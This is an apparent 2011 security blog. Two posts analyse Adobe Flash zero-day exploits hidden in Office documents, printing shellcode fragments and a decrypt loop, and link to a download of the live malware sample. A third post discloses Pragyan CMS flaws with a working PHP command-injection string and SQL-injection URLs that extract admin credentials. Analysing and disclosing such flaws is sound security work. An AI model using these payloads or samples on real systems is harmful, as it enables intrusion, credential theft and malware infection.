Tuesday, April 12, 2011

CVE-2011-0611 Adobe Flash Zero Day embeded in DOC

information about new zero day in adobe flash player :
http://contagiodump.blogspot.com/2011/04/apr-8-cve-2011-0611-flash-player-zero.html
http://www.adobe.com/support/security/advisories/apsa11-02.html

Filename: Disentangling Industrial Policy and Competition Policy.doc
Size:176,144 bytes


My analysis of  Disentangling Industrial Policy and Competition Policy.doc
 
File created 04-Apr-2011 9:50 , by user 7 , and company hust

There are no vulnerabilities in MS Office, there is a vulnerability in embeded swf as was described below.


embeded swf file(local name d:\513.swf)
size 10,421 bytes
decoded action  script


this is heap spray, allocate memory with nop slide=0x11111111.
and load second swf file.

second swf
size 1,484 bytes


SWFTools>swfdump.exe -D 1.swf
[HEADER]        File version: 10
[HEADER]        File size: 1484
[HEADER]        Frame rate: 24.000000
[HEADER]        Frame count: 1
[HEADER]        Movie width: 550.00
[HEADER]        Movie height: 400.00
[045]         4 FILEATTRIBUTES
[00c]      1447 DOACTION
GetU8() out of bounds: TagID = 12

flasm16win>flasm.exe -d 1.swf
movie '1.swf' // flash 10, total frames: 1, frame rate: 24 fps, 550x400 px
frame 0
00000000    push FALSE, 326943637, 326943739
0000000F    oldEquals
00000010    not
00000011    branchIfTrue label2 // offset 1100
00000016    branchIfTrue label1 // offset 24
0000001B    constants 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I'  Declared constant pool length 21 differs from calculated length 20

Disassembly may be incomplete: wrong action length encountered
          end // of frame 0
end

crash exist in Adobe Flash Player plugin .
in my test NPSWF32.dll (10.2.153.1)
crash at location 100cfc03


this possibly related to tweet :
Yuange

call [0x11111110+0x08]
7 Apr


to be continue ...
Posted by villy
Labels:

Tuesday, March 15, 2011

CVE-2011-0609 - Adobe Flash Player ZeroDay

First information about new zero day in adobe flash player was published 03/11/2010 at
https://www.kidinhisroom.com/?q=content/us-cert-ewin-early-warning-indicator-new-adobe-flash-0-day-exploit

Then after 3 days Adobe confirmed bug and released advisory
http://www.adobe.com/support/security/advisories/apsa11-01.html


Filename: crsenvironscan.xls
Size:126,444 bytes
MD5 Hash: 4BB64C1DA2F73DA11F331A96D55D63E2

My analysis of  crsenvironscan.xls
There are no vulnerabilities in MS Office, there is a vulnerability in embeded swf as was described below.


1) There are embeded swf
(target file name f:\sm.swf)


This swf provide heap spray and then load second swf
view source code

it allocates memory
NOP Slide =14141414


then loads second swf.

2) second.swf consist bug

File created possibly by using a fuzzer from

addLabel.swf
 
looks like there are bugs exist when flash player attempts to parse a swf file.
Unknown opcode 152.
Unknown opcode 84. 
(detailed analysis will be provided soon) 
 
3) Shellcode
this is EmbededExec shellcode,not encrypted.
 
decompiled shellcode 
 
Shellcode search for exe between
       cmp     dword ptr [eax], 47422E43h
       cmp     dword ptr [eax+4], 19890604h
 
hex code "432e424704068919" and
 
      cmp     dword ptr [eax], 4B635546h
      cmp     dword ptr [eax+4], 19820424h 
 
hex code "4655634b24048219"


if point view on this

as for me, that looks like some string and date



C.GB  1989/06/04    -  it may mean 1989-06-04 Tiananmen, Beijing, China

 

FucK 1982/04/24    - ? 



   

If you have any ideas, post in comments






Encryption of exe is interesting. 
First 4 bytes of exe header writed from shellcode
then encrypted date decrypts using this algo
 where eax - size of exe
 
decrypt: 
       xor     [ebx], al
       inc     ebx
       dec     eax
       inc     ebx
       dec     eax
       cmp     eax, 0 
       jmp  decrypt
 
This is for the first time I see such encryption in exploits found in the wild.
This is used to bypass scanners, which searches for the exe header.
 
4) Exe 
a.exe 
size 46,048 bytes
MD5: 1e09970c9bf2ca08ee48f8b2e24f6c44
Download Payload File   a.exe 
pass: infected  Virustotal 0/43


Information from PEiD InstallShield AFW [CAB SFX]
 


Sample download link

https://sites.google.com/site/villys777/crsenvironscan.zip

password : infected



Other samples you can get from Mila Parkour site:

http://contagiodump.blogspot.com/2011/03/cve-2011-0609-adobe-flash-player.html

















Posted by
villy












Labels:













          

        

          

        

Friday, February 25, 2011


          

        







Pragyan CMS Multiple Vulnerabilities












Affected Software







Pragyan CMS








Technical Description



1) Code execution in INSTALL/install.php



script not correctly validate entered fields.



possibly write at password field string:







");echo exec($_GET["a"]);echo ("











or in another fields with turned of javascript.



in cms/config.inc.php will be code:



define("MYSQL_PASSWORD","");echo exec($_GET["a"]);echo ("");



which allow command execution.











2) sql injection



- get mysql version



http://host/+view&thread_id=-1 UNION ALL SELECT null,null,null,null,concat(unhex(Hex(cast(@@version as char)))),null,null,null--





- get admin account



http://host/+view&thread_id=-1 UNION ALL SELECT null,null,null,null,(SELECT concat(0x7e,0x27,unhex(Hex(cast(pragyanV3_users.user_id as char))),0x3a,unhex(Hex(cast(pragyanV3_users.user_name as char))),0x3a,unhex(Hex(cast(pragyanV3_users.user_email as char))),0x3a,unhex(Hex(cast(pragyanV3_users.user_password as char))),0x3a,unhex(Hex(cast(pragyanV3_users.user_fullname as char))),0x27,0x7e) FROM `pragyan11`.pragyanV3_users LIMIT 0,1),null,null,null--









Solution



update to Pragyan CMS 3.0 rev.274







Changelog



2011-19-02 : Initial release



2011-20-02 : Reported to vendor



2011-25-02 : patch released



2011-25-02 : public disclose







Credits  




pragyan.org











Posted by
villy
























        

      









Subscribe to:
Posts (Atom)